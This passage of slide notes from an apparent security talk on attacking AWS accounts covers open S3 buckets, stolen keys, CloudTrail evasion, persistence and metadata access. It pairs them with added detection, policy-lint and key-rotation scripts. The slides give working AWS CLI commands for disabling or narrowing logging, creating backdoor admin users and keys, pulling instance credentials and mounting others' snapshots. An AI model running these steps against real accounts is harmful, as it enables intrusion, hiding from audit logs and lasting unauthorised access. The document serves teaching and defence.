  • 33. S3 BUCKETS S3 Buckets • World Browsable: --no-sign-request sends no credentials at all, so a listing that succeeds is readable by anyone on the internet
      aws s3 ls s3://exam.ple/ --no-sign-request --region us-west-2
  • 34. S3 BUCKETS S3 Buckets • World Browsable (flaws.cloud is a public practice target)
      aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2
  • 35. S3 BUCKETS S3 Buckets • Sensitive Files
      aws s3 ls s3://...exam.ple/ --no-sign-request --region us-west-2
  • 36. S3 BUCKETS S3 Buckets • Sensitive Files: pull the whole bucket down locally
      aws s3 sync s3://…exam.ple/ . --no-sign-request --region us-west-2
  • 37. S3 BUCKETS S3 Buckets • Sensitive Files • - GIT • - SVN • - etc… (a synced .git or .svn directory carries the full history, not just the files currently checked in)
      git log
  • 38. S3 BUCKETS S3 Buckets • Sensitive Files: check out an earlier commit to recover what was later "removed"
      git checkout f7c…
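The REGION slide works because the DNS names AWS uses for S3 endpoints embed the region (`s3-website-us-west-2.amazonaws.com`, `s3.us-west-2.amazonaws.com`, the `-w` PTR forms) or, for the legacy region-less names (`s3.amazonaws.com`, `s3-1-w.amazonaws.com`), mean us-east-1. The helper below is an added example, not from the talk: it parses a `dig +noall +answer` section, extracts the region from CNAME targets, and builds the unauthenticated listing command the next slide runs. The dig answer is constructed in dig's output format (`exam.ple` is a placeholder name and the address is a TEST-NET value), not a capture of a real domain.

```python
"""Recover an S3 bucket's region from DNS evidence, offline.

Added example, not from the talk. The dig answer section below is constructed
in `dig +noall +answer` format; the hostnames follow AWS's S3 endpoint naming.
"""
import re
from typing import Dict, List, Optional

# s3.<region>, s3-<region>, s3-website[.-]<region>, each optionally with the
# "-w" suffix seen on PTR records, and always under amazonaws.com.
REGION_RE = re.compile(
    r"(?:^|\.)s3(?:-website)?[.-]"
    r"(?P<region>(?:us|eu|ap|ca|sa|me|af|il|cn)(?:-gov)?-[a-z]+-\d)"
    r"(?:-w)?\.amazonaws\.com\.?$"
)
# Region-less legacy names (s3.amazonaws.com, s3-1-w.amazonaws.com) are us-east-1.
LEGACY_RE = re.compile(r"(?:^|\.)s3(?:-website)?(?:-1)?(?:-w)?\.amazonaws\.com\.?$")


def region_from_hostname(host: str) -> Optional[str]:
    """Region named by an S3 endpoint hostname, or None if it is not one."""
    host = host.strip().lower()
    m = REGION_RE.search(host)
    if m:
        return m.group("region")
    if LEGACY_RE.search(host):
        return "us-east-1"
    return None


def parse_dig_answer(text: str) -> List[Dict[str, str]]:
    """Parse `dig +noall +answer` lines into name / type / data records."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 5 and parts[2] == "IN":
            records.append({"name": parts[0], "type": parts[3], "data": " ".join(parts[4:])})
    return records


def region_from_dig(text: str) -> Optional[str]:
    """First region found among CNAME targets (A records need the PTR lookup)."""
    for rec in parse_dig_answer(text):
        if rec["type"] == "CNAME":
            region = region_from_hostname(rec["data"])
            if region:
                return region
    return None


def listing_command(bucket: str, region: str) -> List[str]:
    """The unauthenticated listing the S3 BUCKETS slide runs once the region is known."""
    return ["aws", "s3", "ls", f"s3://{bucket}/", "--no-sign-request", "--region", region]


# Constructed answer section (placeholder domain, TEST-NET-2 address).
SAMPLE_DIG_ANSWER = (
    "exam.ple.\t300\tIN\tCNAME\texam.ple.s3-website-us-west-2.amazonaws.com.\n"
    "exam.ple.s3-website-us-west-2.amazonaws.com. 60 IN A 198.51.100.20\n"
)

if __name__ == "__main__":
    region = region_from_dig(SAMPLE_DIG_ANSWER)
    print("region:", region)
    print(" ".join(listing_command("exam.ple", region or "us-east-1")))
```

When the target resolves straight to an A record (no CNAME), feed the PTR name from `nslookup <ip>` to `region_from_hostname` instead; the same patterns apply.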
  • 39. LEVERAGE SECRETS Preparation • New EC2 Instance • Setup AWS Tools • Leverage Secrets
  • 40. CONFIGURE Preparation • Leverage Secrets: store the found key pair as a named profile
      aws configure --profile example
  • 41. VERIFY Preparation • Leverage Secrets: the profile is written to ~/.aws/credentials (remove the spaces around the = character for easier scripts)
  • 42. WHOAMI Survey Access • Who Are We? (get-caller-identity needs no IAM permission, so it works for any valid key and is the safe first call)
      aws --profile example sts get-caller-identity
  • 43. IAM WHO Survey Access • Who Are We? • IAM Who? (needs iam:GetUser and fails for role credentials)
      aws --profile example iam get-user
  • 44. LOGGING Survey Access • Who Are We? • Logging? AWS CloudTrail
  • 45. LOGGING? Survey Access • Logging? (lists the account's trails, including whether each is multi-region and where it delivers)
      aws --profile api_cloudtrail cloudtrail describe-trails
  • 46. STOP-LOGS
      aws --profile api_cloudtrail configure set region us-east-1
      aws --profile api_cloudtrail cloudtrail stop-logging --name "arn:aws:cloudtrail:us-east-1:…:trail/…"
  • 47. OPSEC? Survey Access • Logging? AWS CloudTrail (stopping a trail is noisy: the StopLogging call is itself recorded and is a common alert)
  • 48. LOGGING? Survey Access • Logging?
      aws --profile api_cloudtrail cloudtrail describe-trails
  • 49. NO MULTI A quieter move than stopping the trail: turn a multi-region trail into a single-region one. Stops logging in all regions… • EXCEPT the HomeRegion (and --no-include-global-service-events also drops the global-service events, i.e. IAM and STS calls, from that trail)
      aws --profile api_cloudtrail configure set region us-east-1
      aws --profile api_cloudtrail cloudtrail update-trail --name "arn:aws:cloudtrail:us-east-1:…:trail/…" --no-is-multi-region-trail --no-include-global-service-events
  • 50. OPSEC… … Stops logging in all regions… • EXCEPT the HomeRegion AWS CloudTrail
  • 51. PERSIST Persistence • Session Token • - Valid for 12 Hours • Add Key • Add Account
  • 52. PERSIST Persistence • Session Token • - Valid for 12 Hours (the default duration for an IAM user; the call accepts a longer duration, up to 36 hours)
      aws --profile api_cloudtrail sts get-session-token
  • 53. SETUP Persistence • Session Token: add the returned AccessKeyId, SecretAccessKey and SessionToken to a new profile as aws_access_key_id, aws_secret_access_key and aws_session_token
      vi ~/.aws/credentials
  • 54. SESSION Persistence • Session Token: confirm the temporary credentials work
      aws --profile sessionTokens sts get-caller-identity
  • 55. ADD KEY Persistence • Add Key, to an already existing user… (an IAM user can hold at most two access keys, so this fails for a user who already has two)
  • 56. ADD KEY
      aws --profile api_iam iam list-users
  • 57. ADD KEY
      aws --profile api_iam iam create-access-key --user-name test
  • 58. ADD USER Persistence • Session Token • Add Key • Add User
  • 59. ADD USER Create a user and drop it into an existing admin group
      aws --profile api_iam iam create-user --user-name mryan
      aws --profile api_iam iam add-user-to-group --user-name mryan --group-name Admin
  • 60. ADD KEY
      aws --profile api_iam iam create-access-key --user-name mryan
  • 61. ADD PASS Console access as well: a login profile is the user's password
      aws --profile api_iam iam create-login-profile --user-name mryan --password examplepass
  • 62. NEW EC2 …
  • 63. EC2 META Metadata Service: 169.254.169.254 (link-local, reachable from inside the instance with no credentials; it also serves the instance role's temporary credentials under meta-data/iam/security-credentials/)
      curl http://169.254.169.254/latest/meta-data/
    RFC-3927: https://tools.ietf.org/html/rfc3927
    AWS: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
    AWS Query Tool: https://aws.amazon.com/code/1825 …
  • 64. AZURE META Metadata Service: 169.254.169.254
      curl http://169.254.169.254/metadata/v1/maintenance
      curl http://169.254.169.254/metadata/v1/InstanceInfo
    (these are mostly useless for hackers…) but useful information is copied into the /var/lib/waagent directory when the instance is created (root access needed): IP address, hostname, subscription ID, resource group name, etc… …
  • 65. SNAPS & IAM Build a volume from another instance's snapshot, attach it to your own instance (ec2 attach-volume) and mount it, then look for files written in the last day outside the system directories:
      aws --profile api_ec2 ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
      mount /dev/xvdb1 /mnt
      find /mnt -type f -mtime -1 2>/dev/null | grep -v "/var/" | grep -v "/proc/" | grep -v "/dev/" | grep -v "/sys/" | grep -v "/run/" | less
    …
  • 66. HARD BOOT … Horrible OPSEC but it works… - Power off a server - Mount the server's hard drive using another EC2 instance - Modify the server for remote access (e.g. add an SSH key to the root user) - Power the server back on & PROFIT!
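Every move on the LOGGING, PERSIST, SNAPS & IAM and HARD BOOT slides is a management API call, and the calls that disable or narrow a trail are themselves recorded before the trail goes quiet, so a defender reading the home-region trail (or a CloudWatch Logs delivery of it) can catch the whole sequence. The rule set below is an added example, not from the talk or from any vendor: it flags StopLogging/DeleteTrail, an UpdateTrail that drops multi-region or global-service coverage, the CreateUser / CreateAccessKey / CreateLoginProfile / AddUserToGroup persistence steps, and the CreateVolume-from-snapshot / AttachVolume / StopInstances disk-access steps. The records are constructed in the CloudTrail file format; the account ID, trail name, group name, user names and IP address are placeholders (`ADMIN_GROUPS` is an assumption you would set to your own group names).

```python
"""Flag the anti-logging, persistence and disk-tampering calls from the talk.

Added example, not from the talk: a small rule set over CloudTrail records.
The events are constructed in CloudTrail's record format (account 123456789012
and the 198.51.100.0/24 address are documentation/test values), not real logs.
"""
import json
from typing import Dict, Iterable, List, Optional

ADMIN_GROUPS = {"Admin", "Administrators"}   # assumption: adjust to your account


def classify(ev: Dict) -> List[str]:
    """Names of the rules an event trips; empty when nothing is suspicious."""
    src = ev.get("eventSource", "")
    name = ev.get("eventName", "")
    params = ev.get("requestParameters") or {}
    hits: List[str] = []
    if src == "cloudtrail.amazonaws.com":
        if name in ("StopLogging", "DeleteTrail"):
            hits.append("cloudtrail.logging_disabled")           # STOP-LOGS
        elif name == "UpdateTrail" and (
            params.get("isMultiRegionTrail") is False
            or params.get("includeGlobalServiceEvents") is False
        ):
            hits.append("cloudtrail.scope_reduced")              # NO MULTI
    elif src == "iam.amazonaws.com":
        if name in ("CreateUser", "CreateAccessKey", "CreateLoginProfile"):
            hits.append("iam.persistence." + name)               # ADD USER / KEY / PASS
        elif name == "AddUserToGroup" and params.get("groupName") in ADMIN_GROUPS:
            hits.append("iam.admin_group_membership")
    elif src == "ec2.amazonaws.com":
        if name == "CreateVolume" and params.get("snapshotId"):
            hits.append("ec2.volume_from_snapshot")              # SNAPS & IAM
        elif name in ("AttachVolume", "StopInstances"):
            hits.append("ec2.disk_access." + name)               # HARD BOOT steps
    return hits


def triage(events: Iterable[Dict]) -> List[Dict]:
    """One alert per tripped rule, carrying who / where / when for the responder."""
    alerts = []
    for ev in events:
        for rule in classify(ev):
            alerts.append({
                "rule": rule,
                "event": ev.get("eventName"),
                "time": ev.get("eventTime"),
                "region": ev.get("awsRegion"),
                "actor": (ev.get("userIdentity") or {}).get("arn"),
                "source_ip": ev.get("sourceIPAddress"),
            })
    return alerts


def load_records(log_text: str) -> List[Dict]:
    """CloudTrail log files are JSON objects with a top-level "Records" list."""
    return json.loads(log_text)["Records"]


def _ev(source: str, name: str, params: Optional[Dict], region: str = "us-east-1") -> Dict:
    """Build one constructed record with the fields the rules and alerts read."""
    return {
        "eventTime": "2017-03-10T10:00:00Z", "eventSource": source, "eventName": name,
        "awsRegion": region, "sourceIPAddress": "198.51.100.7",
        "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/api_cloudtrail"},
        "requestParameters": params,
    }


TRAIL = "arn:aws:cloudtrail:us-east-1:123456789012:trail/main"
SAMPLE_LOG = json.dumps({"Records": [
    _ev("sts.amazonaws.com", "GetCallerIdentity", None),              # WHOAMI: benign
    _ev("cloudtrail.amazonaws.com", "DescribeTrails", None),          # LOGGING?: benign
    _ev("cloudtrail.amazonaws.com", "UpdateTrail",
        {"name": TRAIL, "isMultiRegionTrail": False, "includeGlobalServiceEvents": False}),
    _ev("cloudtrail.amazonaws.com", "StopLogging", {"name": TRAIL}),
    _ev("iam.amazonaws.com", "CreateUser", {"userName": "mryan"}),
    _ev("iam.amazonaws.com", "AddUserToGroup", {"userName": "mryan", "groupName": "Admin"}),
    _ev("iam.amazonaws.com", "CreateAccessKey", {"userName": "mryan"}),
    _ev("iam.amazonaws.com", "CreateLoginProfile", {"userName": "mryan"}),
    _ev("ec2.amazonaws.com", "CreateVolume",
        {"snapshotId": "snap-0123456789abcdef0", "availabilityZone": "us-west-2a"}, region="us-west-2"),
]})

if __name__ == "__main__":
    for a in triage(load_records(SAMPLE_LOG)):
        print(f"{a['time']} {a['region']:<10} {a['rule']:<34} {a['actor']} from {a['source_ip']}")
```

Run it over the gzip-decompressed objects CloudTrail delivers to its S3 bucket, or wire `classify` into whatever consumes the CloudWatch Logs stream; after the NO MULTI trick only the home region keeps logging, which is exactly why the trail-modification rules should page someone rather than land in a weekly report.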
  • 67. MITIGATIONS • Single-purpose secrets • Limit the access of each secret • Create roles and limit the access of each role • Restrict each secret to the source IP addresses it is used from (an aws:SourceIp policy condition) • Log API calls (e.g. CloudTrail) and alert on changes to the trails themselves • Never use root secrets (keep root as a break-glass account only) • Rotate secrets frequently • Encrypt secrets within Git and other data stores …
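Two of the mitigations above can be checked mechanically: whether a policy really is single-purpose and IP-scoped, and whether keys are actually being rotated. The script below is an added example, not from the talk: `lint_policy` flags Allow statements with wildcard actions or resources and statements without an `aws:SourceIp` condition, and `stale_access_keys` reads the JSON shape `aws iam list-access-keys` prints and reports active keys older than a rotation window. The broad and scoped policies, the key list, the bucket name, the timestamps and the 203.0.113.0/24 range are all constructed (the key IDs are AWS documentation examples).

```python
"""Audit two mitigations from the slide offline: IP-scoped, single-purpose
policies and access-key rotation.

Added example, not from the talk. The policies and the list-access-keys
output below are constructed; the key IDs are AWS documentation examples.
"""
import json
from datetime import datetime, timezone
from typing import Dict, List


def _as_list(value) -> List[str]:
    """IAM allows a string or a list in Action / Resource; normalise to a list."""
    return [value] if isinstance(value, str) else list(value or [])


def lint_policy(doc: Dict, require_source_ip: bool = True) -> List[str]:
    """Problems that make an Allow statement broader than a single-purpose secret needs."""
    statements = doc.get("Statement", [])
    if isinstance(statements, dict):
        statements = [statements]
    problems: List[str] = []
    for i, st in enumerate(statements):
        if st.get("Effect") != "Allow":
            continue
        actions = _as_list(st.get("Action"))
        resources = _as_list(st.get("Resource"))
        if any(a == "*" or a.endswith(":*") for a in actions):
            problems.append(f"statement {i}: wildcard action {actions}")
        if "*" in resources:
            problems.append(f"statement {i}: wildcard resource")
        source_ips = (st.get("Condition") or {}).get("IpAddress", {}).get("aws:SourceIp")
        if require_source_ip and not source_ips:
            problems.append(f"statement {i}: no aws:SourceIp condition")
    return problems


# The shape most "admin for convenience" keys end up with.
BROAD_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": "*", "Resource": "*"},
]}

# One purpose (read deploy artifacts), one prefix, only from the CI range.
SCOPED_POLICY = {"Version": "2012-10-17", "Statement": [{
    "Effect": "Allow",
    "Action": ["s3:GetObject"],
    "Resource": "arn:aws:s3:::deploy-artifacts/*",
    "Condition": {"IpAddress": {"aws:SourceIp": ["203.0.113.0/24"]}},
}]}


def stale_access_keys(list_keys_json: str, max_age_days: int, now: datetime) -> List[Dict]:
    """Active keys older than max_age_days, from `aws iam list-access-keys` output."""
    stale = []
    for key in json.loads(list_keys_json)["AccessKeyMetadata"]:
        # The CLI prints either "...Z" or "...+00:00"; fromisoformat wants the latter.
        created = datetime.fromisoformat(key["CreateDate"].replace("Z", "+00:00"))
        age = (now - created).days
        if key["Status"] == "Active" and age > max_age_days:
            stale.append({"user": key["UserName"], "key": key["AccessKeyId"], "age_days": age})
    return stale


SAMPLE_LIST_ACCESS_KEYS = json.dumps({"AccessKeyMetadata": [
    {"UserName": "test", "AccessKeyId": "AKIAIOSFODNN7EXAMPLE", "Status": "Active",
     "CreateDate": "2016-01-15T00:00:00Z"},
    {"UserName": "mryan", "AccessKeyId": "AKIAI44QH8DHBEXAMPLE", "Status": "Active",
     "CreateDate": "2017-03-09T12:00:00Z"},
    {"UserName": "ci", "AccessKeyId": "AKIAIOSFODNN7EXAMPL2", "Status": "Inactive",
     "CreateDate": "2015-06-01T00:00:00Z"},
]})
NOW = datetime(2017, 3, 10, tzinfo=timezone.utc)   # constructed "today"

if __name__ == "__main__":
    for label, policy in (("broad", BROAD_POLICY), ("scoped", SCOPED_POLICY)):
        print(label, lint_policy(policy) or "ok")
    for k in stale_access_keys(SAMPLE_LIST_ACCESS_KEYS, 90, NOW):
        print(f"rotate {k['user']} {k['key']} ({k['age_days']} days old)")
```

Feed `lint_policy` the documents from `aws iam get-policy-version` and `aws iam get-user-policy`, and `stale_access_keys` the output of `aws iam list-access-keys --user-name <user>` for each user; an inactive-but-present old key is left alone here on purpose, since deleting it is a separate decision.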
  • 68. THANKS! Bryce Kunz - @TweekFawkes …
  • 69. References
    • http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud/hint2.html
    • https://www.slideshare.net/chrisgates/devoops-attacks-and-defenses-for-devops-toolchains
    • http://flaws.cloud/
    • https://danielgrzelak.com/disrupting-aws-logging-a42e437d6594
    • https://danielgrzelak.com/backdooring-an-aws-account-da007d36f8f9
    • https://danielgrzelak.com/exploring-an-aws-account-after-pwning-it-ff629c2aae39
    • http://docplayer.net/24014561-Defending-the-cloud-from-the-full-stack-hack.html